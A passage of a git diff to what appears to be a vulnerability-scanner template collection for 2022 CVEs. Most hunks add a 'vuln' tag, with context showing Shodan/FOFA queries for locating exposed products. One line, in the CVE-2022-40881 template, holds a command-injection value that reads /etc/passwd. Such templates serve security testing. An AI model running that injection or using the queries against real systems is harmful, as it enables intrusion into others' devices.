cve,cve2022,xxe,ssrf,sophos,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index 443199ac938..13f1c145c98 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -28,7 +28,7 @@ info: vendor: wpdevart product: booking_calendar framework: wordpress - tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart,vkev + tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart,vkev,vuln variables: string: "CVE-2022-3982" diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index df95bdc7e34..ca7d442795a 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -33,7 +33,7 @@ info: - http.title:"fortinac" fofa-query: title="fortinac" google-query: intitle:"fortinac" - tags: cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive,vkev + tags: cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive,vkev,vuln variables: boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}" diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 9298ee365e7..704199e5706 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -33,7 +33,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve,cve2022,atlassian,jira,netic,unauth,vkev + tags: cve,cve2022,atlassian,jira,netic,unauth,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index 7c450c27fb9..3605cd25316 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -31,7 +31,7 @@ info: product: raspap shodan-query: http.favicon.hash:-1465760059 fofa-query: icon_hash=-1465760059 - tags: cve,cve2022,packetstorm,raspap,rce,vkev + tags: cve,cve2022,packetstorm,raspap,rce,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index 9a51f7d3e74..6619b154642 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -30,7 +30,7 @@ info: vendor: microchip product: syncserver_s650 shodan-query: html:"Symmetricom SyncServer" - tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip,vkev + tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml index ebb2881fd93..ee99427c2fc 100644 --- a/http/cves/2022/CVE-2022-40032.yaml +++ b/http/cves/2022/CVE-2022-40032.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: simple_task_managing_system_project product: simple_task_managing_system - tags: time-based-sqli,cve,cve2022,packetstorm,simple-task,stms,sqli,simple_task_managing_system_project + tags: time-based-sqli,cve,cve2022,packetstorm,simple-task,stms,sqli,simple_task_managing_system_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml index 9fad0a28a29..80b317adde3 100644 --- a/http/cves/2022/CVE-2022-40047.yaml +++ b/http/cves/2022/CVE-2022-40047.yaml @@ -29,7 +29,7 @@ info: fofa-query: - body="flatpress" - icon_hash=-1189292869 - tags: cve,cve2022,flatpress,authenticated,xss,intrusive + tags: cve,cve2022,flatpress,authenticated,xss,intrusive,vuln variables: randstring: "{{to_lower(rand_base(16))}}" diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml index 46d286ec177..57a7a6131cd 100644 --- a/http/cves/2022/CVE-2022-40083.yaml +++ b/http/cves/2022/CVE-2022-40083.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: labstack product: echo - tags: cve,cve2022,redirect,labstack + tags: cve,cve2022,redirect,labstack,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index fc73946f162..0de8c143c59 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -41,7 +41,7 @@ info: google-query: - intitle:"sign in - airflow" - intitle:"airflow - dags" || http.html:"apache airflow" - tags: cve,cve2022,airflow,rce,oast,authenticated,apache + tags: cve,cve2022,airflow,rce,oast,authenticated,apache,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-40359.yaml b/http/cves/2022/CVE-2022-40359.yaml index 550dbf5243a..fa842a96a2f 100644 --- a/http/cves/2022/CVE-2022-40359.yaml +++ b/http/cves/2022/CVE-2022-40359.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: kfm_project product: kfm - tags: cve,cve2022,xss,kfm,kfm_project + tags: cve,cve2022,xss,kfm,kfm_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-40443.yaml b/http/cves/2022/CVE-2022-40443.yaml index 54a72414f85..f16a13f6b19 100644 --- a/http/cves/2022/CVE-2022-40443.yaml +++ b/http/cves/2022/CVE-2022-40443.yaml @@ -26,7 +26,7 @@ info: product: zzcms shodan-query: html:"zzcms" fofa-query: body="zzcms" - tags: cve,cve22,zzcms,disclosure + tags: cve,cve22,zzcms,disclosure,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index 112121c3931..de4d8cda7cc 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/wp-user/ fofa-query: body=/wp-content/plugins/wp-user/ publicwww-query: /wp-content/plugins/wp-user/ - tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project + tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index b26e3c8fae5..221f69f7575 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -30,7 +30,7 @@ info: vendor: beardev product: joomsport framework: wordpress - tags: time-based-sqli,cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev,vkev + tags: time-based-sqli,cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index 274e98d5625..a3956278abd 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.html:/wp-content/plugins/autoptimize fofa-query: body=/wp-content/plugins/autoptimize publicwww-query: /wp-content/plugins/autoptimize - tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters + tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml index 495c27d1ad4..e26f53e310d 100644 --- a/http/cves/2022/CVE-2022-4059.yaml +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/cryptocurrency-widgets-pack/ fofa-query: body=/wp-content/plugins/cryptocurrency-widgets-pack/ publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/ - tags: time-based-sqli,cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera + tags: time-based-sqli,cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml index 13bc32ace45..34dd6b776bd 100644 --- a/http/cves/2022/CVE-2022-4060.yaml +++ b/http/cves/2022/CVE-2022-4060.yaml @@ -30,7 +30,7 @@ info: vendor: odude product: user_post_gallery framework: wordpress - tags: cve,cve2022,unauth,wpscan,rce,wordpress,wp-plugin,wp,wp-upg,odude,vkev + tags: cve,cve2022,unauth,wpscan,rce,wordpress,wp-plugin,wp,wp-upg,odude,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-40624.yaml b/http/cves/2022/CVE-2022-40624.yaml index fd4de35df70..b47bec462c1 100644 --- a/http/cves/2022/CVE-2022-40624.yaml +++ b/http/cves/2022/CVE-2022-40624.yaml @@ -26,7 +26,7 @@ info: product: pfblockerng shodan-query: "pfBlockerNG" fofa-query: "pfBlockerNG" - tags: cve,cve2024,pfsense,pfblockerng,rce,sqli,netgate + tags: cve,cve2024,pfsense,pfblockerng,rce,sqli,netgate,vuln flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 2d2df29a400..f2d135ca917 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -29,7 +29,7 @@ info: vendor: pluginus product: inpost_gallery framework: wordpress - tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus,vkev + tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-40684.yaml b/http/cves/2022/CVE-2022-40684.yaml index 552db9264ec..f749c20b213 100644 --- a/http/cves/2022/CVE-2022-40684.yaml +++ b/http/cves/2022/CVE-2022-40684.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: fortinet product: fortiproxy - tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive,vkev + tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index be39f3aa7cb..7cec8837738 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -33,7 +33,7 @@ info: - http.html:"Laravel Filemanager" - http.html:"laravel filemanager" fofa-query: body="laravel filemanager" - tags: cve,cve2022,laravel,unisharp,lfi,traversal,vkev + tags: cve,cve2022,laravel,unisharp,lfi,traversal,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index 3100a965e62..04dd3bd0a34 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: tenda product: ac1200_v-w15ev2 - tags: cve2022,cve,tenda,auth-bypass,router,iot,vkev + tags: cve2022,cve,tenda,auth-bypass,router,iot,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index 7bf4b288114..b5d43976a5a 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="kkfileview" - app="kkfileview" - tags: cve,cve2022,kkFileView,xss,keking + tags: cve,cve2022,kkFileView,xss,keking,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index a289ce43339..292a05d4a3b 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -32,7 +32,7 @@ info: shodan-query: - http.favicon.hash:"-244067125" - cpe:"cpe:2.3:h:contec:solarview_compact" - tags: cve,cve2022,solarview,rce,lfi,contec,vkev + tags: cve,cve2022,solarview,rce,lfi,contec,vkev,vuln variables: cmd: "cat${IFS}/etc/passwd" diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index 3b3934e8a56..e42fc4b6110 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -30,7 +30,7 @@ info: vendor: iws-geo-form-fields_project product: iws-geo-form-fields framework: wordpress - tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project,vkev + tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-41352.yaml b/http/cves/2022/CVE-2022-41352.yaml index db77c0a97cd..778612ffb16 100644 --- a/http/cves/2022/CVE-2022-41352.yaml +++ b/http/cves/2022/CVE-2022-41352.yaml @@ -25,7 +25,7 @@ info: - http.favicon.hash:"1624375939" - http.html:"Zimbra Collaboration Suite Web Client" fofa-query: icon_hash="1624375939" - tags: cve,cve2022,zimbra,kev,file-upload,passive,vkev + tags: cve,cve2022,zimbra,kev,file-upload,passive,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-4140.yaml b/http/cves/2022/CVE-2022-4140.yaml index 07872624621..e375de88188 100644 --- a/http/cves/2022/CVE-2022-4140.yaml +++ b/http/cves/2022/CVE-2022-4140.yaml @@ -27,7 +27,7 @@ info: vendor: collne product: welcart_e-commerce framework: wordpress - tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne + tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-41412.yaml b/http/cves/2022/CVE-2022-41412.yaml index b4bc0419852..9a0acd3031c 100644 --- a/http/cves/2022/CVE-2022-41412.yaml +++ b/http/cves/2022/CVE-2022-41412.yaml @@ -28,7 +28,7 @@ info: fofa-query: - title="perfSONAR Toolkit" - title="perfsonar toolkit" - tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar,vkev + tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index 9231d7ed4b7..e2c7d6323bc 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -33,7 +33,7 @@ info: - http.html:"ReQlogic" - http.html:"reqlogic" fofa-query: body="reqlogic" - tags: cve,cve2022,packetstorm,xss,reqlogic + tags: cve,cve2022,packetstorm,xss,reqlogic,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index bf5a8e933d0..05134354686 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -33,7 +33,7 @@ info: - http.html:"RPCMS" - http.html:"rpcms" fofa-query: body="rpcms" - tags: cve,cve2022,rpcms,xss + tags: cve,cve2022,rpcms,xss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-41800.yaml b/http/cves/2022/CVE-2022-41800.yaml index cfecf2fff8d..6daca539902 100644 --- a/http/cves/2022/CVE-2022-41800.yaml +++ b/http/cves/2022/CVE-2022-41800.yaml @@ -34,7 +34,7 @@ info: - body="big-ip apm" - title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" - tags: cve,cve2022,rce,f5,bigip,instrusive,vkev + tags: cve,cve2022,rce,f5,bigip,instrusive,vkev,vuln variables: auth: "admin:{{rand_text_alpha(1)}}" diff --git a/http/cves/2022/CVE-2022-41840.yaml b/http/cves/2022/CVE-2022-41840.yaml index 026a0d4e8c6..548f60c50cc 100644 --- a/http/cves/2022/CVE-2022-41840.yaml +++ b/http/cves/2022/CVE-2022-41840.yaml @@ -29,7 +29,7 @@ info: vendor: collne product: welcart_e-commerce framework: wordpress - tags: cve2022,cve,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne,vkev + tags: cve2022,cve,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index e67358788a3..b7700189fae 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -30,7 +30,7 @@ info: vendor: backdropcms product: backdrop shodan-query: cpe:"cpe:2.3:a:backdropcms:backdrop" - tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms + tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml index 750d49935ac..5871c806007 100644 --- a/http/cves/2022/CVE-2022-42095.yaml +++ b/http/cves/2022/CVE-2022-42095.yaml @@ -28,7 +28,7 @@ info: max-request: 5 vendor: backdropcms product: backdrop_cms - tags: cve2022,cve,xss,cms,backdrop,authenticated,backdropcms + tags: cve2022,cve,xss,cms,backdrop,authenticated,backdropcms,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml index 334b671bec2..5ef7c58c702 100644 --- a/http/cves/2022/CVE-2022-42096.yaml +++ b/http/cves/2022/CVE-2022-42096.yaml @@ -27,7 +27,7 @@ info: max-request: 5 vendor: backdropcms product: backdrop_cms - tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms + tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-42118.yaml b/http/cves/2022/CVE-2022-42118.yaml index 0bf20777b50..5ff6935d7b6 100644 --- a/http/cves/2022/CVE-2022-42118.yaml +++ b/http/cves/2022/CVE-2022-42118.yaml @@ -25,7 +25,7 @@ info: product: liferay_portal shodan-query: html:"var Liferay" fofa-query: body="var Liferay" - tags: cve,cve2022,liferay,xss + tags: cve,cve2022,liferay,xss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-42149.yaml b/http/cves/2022/CVE-2022-42149.yaml index f1621db270b..f1944c2e6a1 100644 --- a/http/cves/2022/CVE-2022-42149.yaml +++ b/http/cves/2022/CVE-2022-42149.yaml @@ -29,7 +29,7 @@ info: - app="kkFileView" - app="kkfileview" - body="kkfileview" - tags: cve,cve2022,ssrf,kkfileview,keking + tags: cve,cve2022,ssrf,kkfileview,keking,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml index acbd0cea78a..a7fe11aca5e 100644 --- a/http/cves/2022/CVE-2022-42233.yaml +++ b/http/cves/2022/CVE-2022-42233.yaml @@ -35,7 +35,7 @@ info: - product=="tenda-11n-wireless-ap" - title="tenda 11n" google-query: intitle:"tenda 11n" - tags: cve,cve2022,tenda,auth-bypass,router,iot + tags: cve,cve2022,tenda,auth-bypass,router,iot,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml index 8f68ff47679..642599a0fa0 100644 --- a/http/cves/2022/CVE-2022-4260.yaml +++ b/http/cves/2022/CVE-2022-4260.yaml @@ -28,7 +28,7 @@ info: vendor: wp-ban_project product: wp-ban framework: wordpress - tags: cve,cve2022,wp-plugin,xss,wordpress,wpscan,wp,authenticated,wp-ban,wp-ban_project + tags: cve,cve2022,wp-plugin,xss,wordpress,wpscan,wp,authenticated,wp-ban,wp-ban_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index a02f0eed372..5c7aef3e133 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -33,7 +33,7 @@ info: - http.html:"CandidATS" - http.html:"candidats" fofa-query: body="candidats" - tags: cve,cve2022,candidats,xss,auieo + tags: cve,cve2022,candidats,xss,auieo,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index 213c2ea6c09..b5ffb86ce4d 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -32,7 +32,7 @@ info: - http.html:"CandidATS" - http.html:"candidats" fofa-query: body="candidats" - tags: cve,cve2022,candidats,xss,auieo + tags: cve,cve2022,candidats,xss,auieo,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index 19382de3ec0..754b009419d 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -33,7 +33,7 @@ info: - http.html:"CandidATS" - http.html:"candidats" fofa-query: body="candidats" - tags: cve,cve2022,candidats,xss,auieo + tags: cve,cve2022,candidats,xss,auieo,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index 2b3e4466663..2a114c04b3b 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -33,7 +33,7 @@ info: - http.html:"CandidATS" - http.html:"candidats" fofa-query: body="candidats" - tags: cve,cve2022,candidats,xss,auieo + tags: cve,cve2022,candidats,xss,auieo,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index 21aa96c3fa1..3dc9599c12a 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.html:/wp-content/plugins/show-all-comments-in-one-page fofa-query: body=/wp-content/plugins/show-all-comments-in-one-page publicwww-query: /wp-content/plugins/show-all-comments-in-one-page - tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty + tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml index b6202e6c875..9abb78b1cff 100644 --- a/http/cves/2022/CVE-2022-4301.yaml +++ b/http/cves/2022/CVE-2022-4301.yaml @@ -29,7 +29,7 @@ info: vendor: sunshinephotocart product: sunshine_photo_cart framework: wordpress - tags: cve2022,cve,xss,sunshine,wordpress,wp-plugin,wpscan,unauth,sunshinephotocart + tags: cve2022,cve,xss,sunshine,wordpress,wp-plugin,wpscan,unauth,sunshinephotocart,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 1230c66acc3..60d5261c4fd 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -34,7 +34,7 @@ info: - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" - tags: cve2022,cve,xss,opencats,authenticated + tags: cve2022,cve,xss,opencats,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index 75d76d421a2..c7d72c58825 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -34,7 +34,7 @@ info: - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" - tags: cve,cve2022,xss,opencats,authenticated + tags: cve,cve2022,xss,opencats,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index f0f9905e1fb..ebad6f5075b 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -34,7 +34,7 @@ info: - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" - tags: cve2022,cve,xss,opencats,authenticated + tags: cve2022,cve,xss,opencats,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index cdf4b0cb4a1..8fc0681cb69 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -31,7 +31,7 @@ info: - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" - tags: cve,cve2022,xss,opencats,authenticated + tags: cve,cve2022,xss,opencats,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index d5b1b7e829c..6b9cd623a50 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -32,7 +32,7 @@ info: - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" - tags: cve,cve2022,xss,opencats,authenticated + tags: cve,cve2022,xss,opencats,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-4305.yaml b/http/cves/2022/CVE-2022-4305.yaml index 0b636867b0f..207a7cda32c 100644 --- a/http/cves/2022/CVE-2022-4305.yaml +++ b/http/cves/2022/CVE-2022-4305.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/login-as-customer-or-user fofa-query: body=/wp-content/plugins/login-as-customer-or-user publicwww-query: /wp-content/plugins/login-as-customer-or-user - tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy + tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-4306.yaml b/http/cves/2022/CVE-2022-4306.yaml index 40836a58118..7be5a434f02 100644 --- a/http/cves/2022/CVE-2022-4306.yaml +++ b/http/cves/2022/CVE-2022-4306.yaml @@ -29,7 +29,7 @@ info: vendor: panda_pods_repeater_field_project product: panda_pods_repeater_field framework: wordpress - tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated,panda_pods_repeater_field_project + tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated,panda_pods_repeater_field_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml index 2b1cfa457e7..4079fce8fec 100644 --- a/http/cves/2022/CVE-2022-43140.yaml +++ b/http/cves/2022/CVE-2022-43140.yaml @@ -33,7 +33,7 @@ info: - app="kkFileView" - app="kkfileview" - body="kkfileview" - tags: cve2022,cve,ssrf,kkFileview,keking + tags: cve2022,cve,ssrf,kkFileview,keking,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index 870e1a96429..d456e5c1450 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -29,7 +29,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index ae63dc41f08..4fb4de76cdf 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -29,7 +29,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index 5c04f794e8a..72e1f6bad3b 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -29,7 +29,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index 7d3266fff3c..a3a9db0d644 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -29,7 +29,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index a2c462ea7b3..f0f88e95b83 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -29,7 +29,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: 